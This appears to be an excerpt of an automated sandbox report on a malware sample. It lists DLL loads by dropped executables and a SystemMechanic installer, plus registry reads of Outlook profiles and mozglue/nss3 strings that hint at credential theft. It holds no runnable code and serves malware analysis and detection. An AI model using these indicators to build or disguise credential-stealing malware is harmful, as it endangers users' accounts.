Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: schedcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: mozglue.pdbP source: u5g0.0.exe, 00000001.00000002.2101479423.000000006CB0D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb@ source: u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
